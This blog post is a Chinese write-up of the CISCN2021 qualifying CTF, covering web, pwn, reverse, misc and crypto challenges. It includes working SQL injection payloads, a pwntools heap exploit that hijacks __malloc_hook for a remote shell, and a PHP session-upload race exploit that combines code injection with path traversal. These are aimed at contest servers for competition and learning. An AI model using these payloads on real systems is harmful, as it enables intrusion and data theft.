CISCN2021 初赛 Write UP

总榜62,东北赛区第三,打不过

easy_sql

登陆页面,sql注入

passwd处报错注入:

uname=admin&passwd=1') and updatexml(1,concat(0x7e,(select*from (select * from flag as a join flag as b using(id,no))as c),0x7e),1)#&Submit=%E7%99%BB%E5%BD%95
图片[1]-CISCN2021 初赛 Write UP-魔法少女雪殇

报错出字段,继续

uname=admin&passwd=1')||updatexml(1,((select `cb9704e8-dfcb-4feb-90c7-d84c92ef0062` from flag limit 0,1)),1)%23#&Submit=%E7%99%BB%E5%BD%95
图片[2]-CISCN2021 初赛 Write UP-魔法少女雪殇

easy_source

原题:https://r0yanx.com/2020/10/28/fslh-writeup/

直接访问;?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment

tiny traffic

开局流量包,直接导出全部内容

关键信息为

图片[3]-CISCN2021 初赛 Write UP-魔法少女雪殇

lag_warpper导出后没用,无视

先导出就是

把test和secret后缀改为br,解压导出内部内容

test的提取后内容

syntax = "proto3";

message PBResponse {
  int32 code = 1;
  int64 flag_part_convert_to_hex_plz = 2;
  message data {
    string junk_data = 2;
    string flag_part = 1;
  }
  repeated data dataList = 3;
  int32 flag_part_plz_convert_to_hex = 4;
  string flag_last_part = 5;
}

message PBRequest {
  string cate_id = 1;
  int32 page = 2;
  int32 pageSize = 3;
}

是proto3,推测利用这个对sercet进行加密,那么直接解密就好

把test重命名为pb.proto,直接运行

protoc –decode=PBResponse pb.proto < secret

图片[4]-CISCN2021 初赛 Write UP-魔法少女雪殇

获得结果

code: 200
flag_part_convert_to_hex_plz: 15100450
dataList {
  flag_part: "e2345"
  junk_data: "7af2c"
}
dataList {
  flag_part: "7889b0"
  junk_data: "82bc0"
}
flag_part_plz_convert_to_hex: 16453958
flag_last_part: "d172a38dc"

把非16进制的内容转换为hex就行了

最后拼接

CISCN{e66a22e23457889b0fb1146d172a38dc}

running_pixel

一个gif,观察每隔10帧的内容有所不同, 好像是被破损的一样,提取全部帧数

from PIL import Image
import os
gifFileName = 'running_pixel.gif'
im = Image.open(gifFileName)
pngDir = gifFileName[:-4]
os.mkdir(pngDir)
try:
 while True:
  current = im.tell()
  im.save(pngDir+'/'+str(current)+'.png')

  im.seek(current+1)
except EOFError:
  pass

然后对照片进行图片模式改变,可以发现原来图片是p模式,改为rgb模式,发现图片中存在颜色不一致的地方,背景色为247,247,247,部分像素颜色为233,233,233,所以将颜色为233,233,233区块的位置尝试画出来,发现内容

脚本:

res = Image.new("L", (400,400), 255)
from PIL import Image
import time
for i in range(382):
    img = Image.open(f"./running_pixel/{i}.png").convert("RGB")
    for x in range(img.size[0]):
        for y in range(img.size[1]):
            p = img.getpixel((x,y))
            if p == (233,233,233):#此颜色与背景白247,247,247非常相似,但是利用色彩工具即可识别,所以推测233,233,233为关键内容
                res.putpixel((y,x), 0)
                res.save(f"new-{i}.png")

截图输出,可以发现也是个类似gif,然后手动右键字符逐个出现,按顺序写即可

内容为:

12504D0F-9DE1-4B00-87A5-A5FDD0986A00

包上CISCN交不上,改为小写即可

CISCN{12504d0f-9de1-4b00-87a5-a5fdd0986a00}

pwny

菜单里面有读写俩功能,从内存读数据和写数据,写的话是文件描述符,首先利用两次写的能力给文件描述符去掉,这样就能从终端写入数据了,然后读bss上的stderr和data中的数据,泄露出libc和程序的基址,然后就可以打mallochook,利用输入的scanf会申请堆块getshell

from pwn import *

#p = process('./pwny')
p = remote('124.70.45.83', 23955)

def read():
    p.recvuntil('Your choice: ')
    p.sendline('1')

def write(content):
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Index:')
    p.sendline(str(content))

def newread(index):
    p.recvuntil('Your choice: ')
    p.sendline('1')
    p.recvuntil('Index:')
    p.send(p64(index))


def pwn(index, content):
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Index:')
    p.sendline(str(index))
    p.send(content)


write(0x100)
write(0x100)
newread(0xfffffffffffffff5)
p.recvuntil(': ')
base = int(p.recv(12),16) - 0x202008
print(hex(base))

newread(0xfffffffffffffffc)
p.recvuntil(': ')
leak = int(p.recv(12),16)
libc = ELF('./libc-2.27.so')
libc_base = leak - libc.sym['_IO_2_1_stderr_']
print(hex(libc_base))
one_gadget = libc_base + 0x10a41c
bss = base + 0x202060
malloc_hook = libc_base + libc.sym['__malloc_hook']
malloc_index = (malloc_hook - bss)//8
realloc_index = (malloc_hook - 8 - bss)//8

pwn(realloc_index, p64(one_gadget))
t = libc_base+libc.symbols["realloc"]+4
pwn(malloc_index, p64(t))
p.sendlineafter(":", b"1"*0x600)
p.interactive()

glass

apkre。checkflag再native层,

输入了39位,然后与密钥进行rc4,并进行xor运算,最终验证,根据脚本反推即可

密文:aim:0xA3,0x1A,0xE3,0x69,0x2F,0xBB,0x1A,0x84,0x65,0xC2,0xAD,0xAD,0x9E,0x96,0x05,0x02,0x1F,0x8E,0x36,0x4F,0xE1,0xEB,0xAF,0xF0,0xEA,0xC4,0xA8,0x2D,0x42,0xC7,0x6E,0x3F,0xB0,0xD3,0xCC,0x78,0xF9,0x98,0x3F

脚本:

aim = [0xA3,0x1A,0xE3,0x69,0x2F,0xBB,0x1A,0x84,0x65,0xC2,0xAD,0xAD,0x9E,0x96,0x05,0x02,0x1F,0x8E,0x36,0x4F,0xE1,0xEB,0xAF,0xF0,0xEA,0xC4,0xA8,0x2D,0x42,0xC7,0x6E,0x3F,0xB0,0xD3,0xCC,0x78,0xF9,0x98,0x3F]
key = "12345678"
n_aim = []
i = 0


for i in range(40):
	for j in range(len(key)):
		for k in range(0,0x100):
			if k ^ (ord(key[j])) == aim[i]:
				n_aim.append(k)
				print(n_aim)
				break
		i += 1
		if i == 39:
			break

aim = n_aim[:]
n_aim = []
for i in range(0,39,3):
	flag = False
	for a in range(0, 0x100): 
		for b in range(0, 0x100): 
			for c in range(0, 0x100): 
				if (a^c) == aim[i] and (b^c) == aim[i+2] and (b^(a^c)) == aim[i+1]:
					print(f"{a} {b} {c}")
					n_aim.append(a)
					n_aim.append(b)
					n_aim.append(c)
					flag = True
				if flag == True:
					break
			if flag == True:
				break
		if flag == True:
			break	


for i in n_aim:
	print(str(hex(i))[2:], end=' ')

最后转rc4即可

图片[5]-CISCN2021 初赛 Write UP-魔法少女雪殇

隔空传话

二血,好耶

开局一堆加密通话,谷歌搜索关键字符串找到相关文章:

[合宙AT指令发送短信 Luat doc 社区文章静态页面 ] (luatos.wiki)

归根结底就是pdu短信的一个编码,那就找到网站,挨个行进行转换吧。。。

工具:

图片[6]-CISCN2021 初赛 Write UP-魔法少女雪殇

逐一操作,获得如下字符内容(手 工 带 师):

图片[7]-CISCN2021 初赛 Write UP-魔法少女雪殇

(截图往后都是十六进制,暂时先不管

从前两句可以知道这个意思是第一部分flag是前八个字符,但是后面的w465暂时就不知道是啥了

而且下面的十六进制数据丢入winhex可以发现有PNG的头

图片[8]-CISCN2021 初赛 Write UP-魔法少女雪殇

那说明数据肯定是经过了混淆,然后在逐一转换的过程中,注意到时间并非为线性顺序,而是乱序

图片[9]-CISCN2021 初赛 Write UP-魔法少女雪殇

此处是第一张图的段落在第二张图段落的前面,可是转换后的时间却不是,那说明需要进行转换,将数据按照时间顺序排序才可以

此处在github上pull一个脚本

tools/Misc/PCRT_PNG at f1542a2c1c0bf79b89a74f9cfffec2393c2e6ab3 · developer-hsm/tools (github.com)

该脚本可以将png的zlib直接进行修复,免去写时间然后排序的麻烦事(是非预期

图片[10]-CISCN2021 初赛 Write UP-魔法少女雪殇

直接binwalk前面的一堆16进制转好的原图

把zlib提取出,使用上述脚本

python2 PCRT.py -d 5B.zlib

即可恢复出完整数据,丢入winhex转换成图片即可

图片[11]-CISCN2021 初赛 Write UP-魔法少女雪殇

此处调整半天,crc爆破也没成,然后灵光一现,前面的哪个w465是不是代表的是宽度为465??

改一下宽度,获得图片

图片[12]-CISCN2021 初赛 Write UP-魔法少女雪殇

最后拼接flag

CISCN{15030442_b586_4c9e_b436_26def12293e4}

middle_source

进入,一个代码,提示flag在/etc下

网站有个.listing文件,(include特性)然后可以看见有个you_can_seeeeeeee_me.php

目录穿越直接访问

图片[13]-CISCN2021 初赛 Write UP-魔法少女雪殇

获得phpinfo,可以看见seession的一个路径,那实锤打session,

参考文章:https://www.plasf.cn/articles/d42c963778.html

exp :

import io
import requests
import threading
sessid = 'S3BABFKDMFSAFLL'
data = {"cmd":"system('cat flag.php');"}
def write(session):
 while True:
  f = io.BytesIO(b'a' * 1024 * 50)
  resp = session.post('http://124.70.45.83:23753/',
   data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php scandir(readfile("/etc/chbdfhfefb/fbgfaeecad/cahcbiidcb/aejfhfffba/ecdiehbhab/fl444444g"));?>'},
   files={'file': ('test.txt',f)},
    cookies={'PHPSESSID': sessid} )#通过scandir('/etc')逐层寻找flag所在位置,嗯套
    
def read(session):
 while True:
  data={
  'filed':'',
  'cf':'../../../../../../var/lib/php/sessions/cfaefhcedg/sess_'+sessid
  }
  resp = session.post('http://124.70.45.83:23753/',data=data)
  if 'test.txt' in resp.text:
   print(resp.text)
   event.clear()
  else:
   print("[+++++++++++++]retry")
if __name__=="__main__":
 event=threading.Event()
 with requests.session() as session:
  for i in range(1,10): 
   threading.Thread(target=write,args=(session,)).start()
  for i in range(1,10):
   threading.Thread(target=read,args=(session,)).start()
 event.set()

baby_bc

参考文章:

How to make llvm .bc file executable? – Stack Overflow

llc -filetype=obj my-file.bc
gcc my-file.o
./a.out

直接照着打就完事了

输出内容导入ida,可以看出这是个数独直接解就行了,然后填符合要求的0-5数字最后直接上z3爆破嗷

rowss = [[0x00, 0x00, 0x00, 0x01],[0x01, 0x00, 0x00, 0x00], [0x02, 0x00, 0x00, 0x01], [0x00, 0x00, 0x00, 0x00], [0x01, 0x00, 0x01, 0x00]]
colnms = [[0x00, 0x00, 0x02, 0x00,0x02], [0x00, 0x00, 0x00, 0x00, 0x00], [0x00, 0x00, 0x00, 0x01, 0x00], [0x00, 0x01, 0x00, 0x00, 0x01]]

from z3 import *
from hashlib import md5

s = Solver()

map = [[None]*5,[None]*5,[None]*5,[None]*5,[None]*5,]
for i in range(5):
    for j in range(5):
        map[i][j]=(Int("x%d%d"%(i, j)))
print(map)
s.add(map[2][2] == 4)
s.add(map[3][3] == 3)
for i in range(5):
    for j in range(5):
        s.add(map[i][j] >= 1)
        s.add(map[i][j] <= 5)
for i in range(5):
    for j in range(5):
        for k in range(j):
            s.add(map[i][j] != map[i][k])
for j in range(5):
    for i in range(5):
        for k in range(i):
            s.add(map[i][j] != map[k][j])
for i in range(5):
    for j in range(4):
        if rowss[i][j] == 1:
            s.add(map[i][j] > map[i][j+1])
        elif rowss[i][j] == 2:
            s.add(map[i][j] < map[i][j+1])
for i in range(4):
    for j in range(5):
        if colnms[i][j] == 2:
            s.add(map[i][j] > map[i+1][j])
        elif colnms[i][j] == 1:
            s.add(map[i][j] < map[i+1][j])

answer = s.check()
if answer == sat:
    print(s.model())
    m = s.model()
    flag = []
    for i in map:
        for j in i:
            flag.append(m[j].as_long())
    for i in range(len(flag)):
        flag[i] += 0x30
    flag[12] = 0x30
    flag[18] = 0x30
    flag = bytes(flag)
    print(md5(flag).hexdigest())

move

较为简单的题,丢入sage跑就行了

A=matrix(ZZ,2,[2**512,0,67595664083683668964629173652731210158790440033379175857028564313854014366016864587830963691802591775486321717360190604997584315420339351524880699113147436604350832401671422613906522464334532396034178284918058690365507263856479304019153987101884697932619200538492228093521576834081916538860988787322736613809,80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421106848023637323702085026892674032294882180449860010755423988302942811352582243198025232225481839705626921264432951916313817802968185697281])
A = A.LLL()
B = A.transpose()
C = B.LLL()
C = -C
x = 0x3a19a367657a5c8ee46cebe63688f386eaaee9be4f57606584230eddcca53bb4#hex(C[0][0]>>512)
e = 67595664083683668964629173652731210158790440033379175857028564313854014366016864587830963691802591775486321717360190604997584315420339351524880699113147436604350832401671422613906522464334532396034178284918058690365507263856479304019153987101884697932619200538492228093521576834081916538860988787322736613809
n = 80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421106848023637323702085026892674032294882180449860010755423988302942811352582243198025232225481839705626921264432951916313817802968185697281
y = e*x//n
k = e*x-y*n
K = k//y
l,r = 0,K
for i in range(515):
    s=(l+r)//2
    v=s*s-int(s*s*9*(K-1-s)*(K-1-s))//(round(n**0.25)*round(n**0.25))
    if v<4*n:
        l=s
    else:
        r=s
pandq=r
d = inverse_mod(e,n+pandq+1)
Cx= 6785035174838834841914183175930647480879288136014127270387869708755060512201304812721289604897359441373759673837533885681257952731178067761309151636485456082277426056629351492198510336245951408977207910307892423796711701271285060489337800033465030600312615976587155922834617686938658973507383512257481837605
Cy= 38233052047321946362283579951524857528047793820071079629483638995357740390030253046483152584725740787856777849310333417930989050087087487329435299064039690255526263003473139694460808679743076963542716855777569123353687450350073011620347635639646034793626760244748027610309830233139635078417444771674354527028
b=(Cy**2-Cx**3)%n
E=EllipticCurve(Zmod(n), [0, b])
C=E(Cx,Cy)
P=d*C
print(P)

得到(1500537458076802315061673741609048809282155574 :293348288331056197202496342835702240774641366909 : 1) 然后将前两个longtobytes拼接得到flag:

CISCN{e91fef4ead7463b13d00bda65f540477}

robot

下载文件,谷歌搜索后缀,得知是Robotstudio的工程文件,在网络上下载后安装打开导入工程

图片[14]-CISCN2021 初赛 Write UP-魔法少女雪殇

类似工控题目,开启后直接仿真运行。

图片[15]-CISCN2021 初赛 Write UP-魔法少女雪殇

提示故障,这里经过搜索需要更改模式调整控制面板

图片[16]-CISCN2021 初赛 Write UP-魔法少女雪殇

进入示教器

更改手动模式

图片[17]-CISCN2021 初赛 Write UP-魔法少女雪殇

逐次进入:

图片[18]-CISCN2021 初赛 Write UP-魔法少女雪殇
图片[19]-CISCN2021 初赛 Write UP-魔法少女雪殇
图片[20]-CISCN2021 初赛 Write UP-魔法少女雪殇
图片[21]-CISCN2021 初赛 Write UP-魔法少女雪殇

编辑内容:

图片[22]-CISCN2021 初赛 Write UP-魔法少女雪殇

将此处选项全部改为yes后重启

图片[23]-CISCN2021 初赛 Write UP-魔法少女雪殇

再次仿真,即可正常启动

打开给的control

图片[24]-CISCN2021 初赛 Write UP-魔法少女雪殇

进行connect

图片[25]-CISCN2021 初赛 Write UP-魔法少女雪殇

通过在下面绘画,可以发现上面进行了绘制

观察右边数据,为三个坐标,那么打开流量包进行观察

图片[26]-CISCN2021 初赛 Write UP-魔法少女雪殇

是有特定的value值,且格式符合绘制格式,所以推测这就是绘制的关键,将其提取出后写脚本plot即可

脚本:

import re
from PIL import Image

RE = re.compile(r"Value\.\[(\d+),(\d+),(\d+)\]")

with open("value", 'r') as f:
    data = f.read()
data = RE.findall(data)

img = Image.new("L", (400,400),0)
for i in data:
    img.putpixel((int(i[0]), int(i[1])), 255)
img.save("value.png")
图片[27]-CISCN2021 初赛 Write UP-魔法少女雪殇

转为md5后提交即可

RSA

首先进来是小e攻击,然后是共模攻击,剩下的就是已知p高位攻击,嗯套

前面两个就很简单,第三个就先通过sage获取p和q

脚本:

p=0xda5f14bacd97f5504f39eeef22af37e8551700296843e536760cea761d334508003e01b886c0c600000000000000000000000000000000000000000000000000

n=0xa188aaaf75c79219462f0ba90b68cb6e0694b113c89b8006f3a54f6374bbc0d91fb83b15866d93fd74019e1e541edce6c06c012c76f41af516f5cc89f5f9984f4e626607632edec7139e5acc4a3f3f0dd90665d469fcf7c9226fb0fe275b6b2a776dac8d032c880eec9862fc9d6480fb9cd2ce3e65867eac7e52d4462fb501eb

f = x + p

kb = 200

PR.<x> = PolynomialRing(Zmod(n))
x0 = f.small_roots(X=2^kb, beta=0.4)[0]
print ("x: %s" %hex(int(x0)))
p = p+x0
print ("p: ", hex(int(p)))
assert n % p == 0
q = n/int(p)
print ("q: ", hex(int(q)))
图片[28]-CISCN2021 初赛 Write UP-魔法少女雪殇

然后对三个msg进行解密

代码:

from gmpy2 import *
import gmpy2
import hashlib
from Crypto.Util.number import long_to_bytes,bytes_to_long,getPrime


x1 = 0
y1 = 2

text = []
msg1 = text[:x1]
msg2 = text[x1:y1]
msg3 = text[y1:]
msg1 = bytes_to_long(msg1);msg2 = bytes_to_long(msg2);msg3 = bytes_to_long(msg3)
p1 = getPrime(512);q1 = getPrime(512)
N1 = p1*q1
p2 = getPrime(512);q2 = getPrime(512)
N2 = p2*q2
e1,e2,e3 = 3,17,65537
p3 = getPrime(512);q3 = getPrime(512)
N3 = p3*q3
enc1 = 19105765285510667553313898813498220212421177527647187802549913914263968945493144633390670605116251064550364704789358830072133349108808799075021540479815182657667763617178044110939458834654922540704196330451979349353031578518479199454480458137984734402248011464467312753683234543319955893
n = 123814470394550598363280518848914546938137731026777975885846733672494493975703069760053867471836249473290828799962586855892685902902050630018312939010564945676699712246249820341712155938398068732866646422826619477180434858148938235662092482058999079105450136181685141895955574548671667320167741641072330259009L

msg1,msg2,msg3 = ""

for j in range(130000000):
    a, b = gmpy2.iroot(enc1 + j * n, 3)
    if b == 1:
        m = a
        print('x {:x}'.format(m))
        print("flag {}".format(long_to_bytes(m)))
        msg1 = long_to_bytes(m)
        break

n2 = 111381961169589927896512557754289420474877632607334685306667977794938824018345795836303161492076539375959731633270626091498843936401996648820451019811592594528673182109109991384472979198906744569181673282663323892346854520052840694924830064546269187849702880332522636682366270177489467478933966884097824069977L
e1 = 17
e2 = 65537
s = gcdext(e1, e2)
s1 = s[1]
s2 = -s[2]
c1 = 54995751387258798791895413216172284653407054079765769704170763023830130981480272943338445245689293729308200574217959018462512790523622252479258419498858307898118907076773470253533344877959508766285730509067829684427375759345623701605997067135659404296663877453758701010726561824951602615501078818914410959610
c2 = 91290935267458356541959327381220067466104890455391103989639822855753797805354139741959957951983943146108552762756444475545250343766798220348240377590112854890482375744876016191773471853704014735936608436210153669829454288199838827646402742554134017280213707222338496271289894681312606239512924842845268366950
c2 = invert(c2, n2)
msg2 = long_to_bytes((pow(c1,s1,n2) * pow(c2 , s2 , n2)) % n2)
p3 = 11437038763581010263116493983733546014403343859218003707512796706928880848035239990740428334091106443982769386517753703890002478698418549777553268906496423
q3 = 9918033198963879798362329507637256706010562962487329742400933192721549307087332482107381554368538995776396557446746866861247191248938339640876368268930589
enc3 = 59213696442373765895948702611659756779813897653022080905635545636905434038306468935283962686059037461940227618715695875589055593696352594630107082714757036815875497138523738695066811985036315624927897081153190329636864005133757096991035607918106529151451834369442313673849563635248465014289409374291381429646
e3 = 
65537
n3 = 113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147L

ph3 = (p3-1)*(q3-1)
d3 = gmpy2.invert(e3,ph3)
msg3 = long_to_bytes(pow(enc3,d3,n3))

msg = msg1 + msg2 + msg3
md5 = hashlib.md5()
md5.update(msg)
print md5.hexdigest()

homo

密码题,一个同态加密的题目,参考文章:

(6条消息) 同态加密技术总结liyakai_cn的博客-CSDN博客同态加密

nc连进去后给了四个参数,结合给的代码可知

图片[29]-CISCN2021 初赛 Write UP-魔法少女雪殇

此处nc输出的内容依次对应公钥pk0,pk1和密文ct0,ct1

这里github上也有个脚本,以供参考

danger-of-using-homomorphic-encryption/CCA_attack_on_FPSI.py at master · edwardz246003/danger-of-using-homomorphic-encryption (github.com)

那么只需要通过攻击出私钥sk,然后再次进行对密文内容的解密即可

图片[30]-CISCN2021 初赛 Write UP-魔法少女雪殇

此处要进行堆积数据,也就是需要count200次以上才可以进行下面的使用选项2

图片[31]-CISCN2021 初赛 Write UP-魔法少女雪殇

当满足时然后才进行尝试解密功能,然后发送即可实现解密的效果,并且需要对c0与c1分别解密

图片[32]-CISCN2021 初赛 Write UP-魔法少女雪殇

根据上述,以及参考脚本可运算出私钥sk的值为01二进制组成,同理,推测结果也是由01进行组成。

图片[33]-CISCN2021 初赛 Write UP-魔法少女雪殇

(用参考脚本直接改将nc进去的数据手动输入也可以,但是数据过大就还是用远程方式节约一下资源了)

from copy import deepcopy
from pwn import *
import randcrack
import random



rc = randcrack.RandCrack()
context.log_level="debug"
p=remote('124.70.45.83',23580)

def recover_key(i):
    cc0=pk0[:]
    cc1=pk1[:]
    cc0[i] += M
    cc1[0] += M
    return cc0, cc1

def recover_key(i):
    cc0=pk0[:]
    cc1=pk1[:]
    cc0[i] += M
    cc1[0] += M
    return cc0, cc1

def f(c):
    payload = str(c[0])
    for i in range(1023):
        payload += ','+str(c[i+1])
    return payload
p.recvuntil("\n")
p.recvuntil("\n")
#save
c_0=eval(p.recvuntil("\n"))
c_1=eval(p.recvuntil("\n"))
c0=deepcopy(c_0)
c0[0]-=1
c1=deepcopy(c_1)
c1[0]+=1


p.recvuntil("2.decrypt")
p.sendline("1")
mask = (1 << 32) - 1


for i in range(312):			
    p.recvuntil("your number:")
    p.sendline("1")
    p.recvuntil("lose!my number is")
    r = int(p.recvuntil("\n").decode().strip("\n"))
    r1=r>>32
    r2=r&mask
    rc.submit(r2)
    rc.submit(r1)
    
for i in range(200):
    #decode
    p.recvuntil("your number:")
    m=rc.predict_randrange(0, 2 ** 64 - 1)
    p.sendline(str(m))
    
p.sendline("2")   
p.recvuntil("c0:")
p.sendline(",".join(str(strs) for strs in c0))
p.recvuntil("c1:")
p.sendline(",".join(str(strs) for strs in c1))
p.recvuntil("\n")
p.recvuntil("\n")
p.recvuntil("\n")
p.recvuntil("\n")
图片[34]-CISCN2021 初赛 Write UP-魔法少女雪殇

获得二进制数据,直接转换字符即可

图片[35]-CISCN2021 初赛 Write UP-魔法少女雪殇
© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 共169条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情
    • 头像Wilfred0
    • 头像Malik1
    • 头像Donny0
    • 头像Aidan0
    • 头像Jamie0
    • 头像Jerald0
    • 头像Russel0
    • 头像Antonia0
    • 头像Arlie0
    • 头像Elmer0
    • 头像Allan0
    • 头像Lamar0
    • 头像Guadalupe0
    • 头像Mason0
    • 头像Lowell0
    • 头像Ruben0
    • 头像Angel0
    • 头像Jamel0
    • 头像Isabelle0
    • 头像Jake0
    • 头像Laurence0
    • 头像Zachariah0
    • 头像Young0
    • 头像Fidel0
    • 头像Bernie0
    • 头像Ethan0
    • 头像Merle0
    • 头像Russel0
    • 头像Hosea0
    • 头像Pablo0
    • 头像Brooke0
    • 头像Josue0
    • 头像Agustin0
    • 头像Calvin0
    • 头像Cooler1110
    • 头像Morgan0
    • 头像Laurence0
    • 头像Ferdinand0
    • 头像Miles0
    • 头像Ronny0
    • 头像Jeffry0
    • 头像Lawerence0
    • 头像Willis0
    • 头像Johnathan0
    • 头像Sherman0
    • 头像Vance0
    • 头像Olivia0
    • 头像Carol0
    • 头像Claire0
    • 头像Wendell0
    • 头像Lyndon0
    • 头像Earle0
    • 头像Connor0
    • 头像Jorge0
    • 头像Lauren0
    • 头像Wayne0
    • 头像Broderick0
    • 头像Gerard0
    • 头像Royce0
    • 头像Adalberto0
    • 头像Jamie0
    • 头像Kayla0
    • 头像Luke0
    • 头像Denver0
    • 头像Jessica0
    • 头像Graig0
    • 头像Lillian0
    • 头像Abraham0
    • 头像Ryan0
    • 头像Mervin0
    • 头像Marty0
    • 头像Jozef0
    • 头像Delmer0
    • 头像Brian0
    • 头像Madelyn0
    • 头像Rocco0
    • 头像Sophie0
    • 头像Garret0
    • 头像Lance0
    • 头像Xavier0
    • 头像Felix0
    • 头像Jeromy0
    • 头像Steven0
    • 头像Lily0
    • 头像Columbus0
    • 头像Tyron0
    • 头像Razer220
    • 头像Haywood0
    • 头像Seth0
    • 头像Roman0
    • 头像Erwin0
    • 头像Wallace0
    • 头像Hayden0
    • 头像Carroll0
    • 头像Eugene0
    • 头像Graig0
    • 头像Snoopy0
    • 头像Merrill0
    • 头像Natalie0
    • 头像Simon0
    • 头像Monroe0
    • 头像Kendall0
    • 头像Dominic0
    • 头像Ezekiel0
    • 头像Mackenzie0
    • 头像Quaker0
    • 头像Doyle0
    • 头像Chance0
    • 头像Nogood870
    • 头像Cody0
    • 头像Derek0
    • 头像Julio0
    • 头像Mohammad0
    • 头像Tobias0
    • 头像Dominic0
    • 头像Santos0
    • 头像Lyman0
    • 头像Friend350
    • 头像Angelo0
    • 头像Wilber0
    • 头像Shelton0
    • 头像Lamont0
    • 头像Kyle0
    • 头像Garry0
    • 头像Grady0
    • 头像Melissa0
    • 头像Colby0
    • 头像Albert0
    • 头像Elliot0
    • 头像Reynaldo0
    • 头像Tommie0
    • 头像Laurence0
    • 头像Grover0
    • 头像Hyman0
    • 头像Jeramy0
    • 头像Victor0
    • 头像Edmundo0
    • 头像Incomeppc0
    • 头像Terence0
    • 头像Walter0
    • 头像Ashley0
    • 头像Clifton0
    • 头像Rosario0
    • 头像Genaro0
    • 头像Emile0
    • 头像Lucky0
    • 头像Denny0
    • 头像Rubin0
    • 头像Genesis0
    • 头像Incomeppc0
    • 头像Walker0
    • 头像Timmy0
    • 头像Calvin0
    • 头像Desmond0
    • 头像Quincy0
    • 头像Thebest0
    • 头像Norberto0
    • 头像Irwin0
    • 头像Shane0
    • 头像Everett0
    • 头像Manuel0
    • 头像Plank0
    • 头像Evelyn0
    • 头像Willard0
    • 头像Bobby0
    • 头像Elisha0
    • 头像godbug0
    • 头像hzlrobot0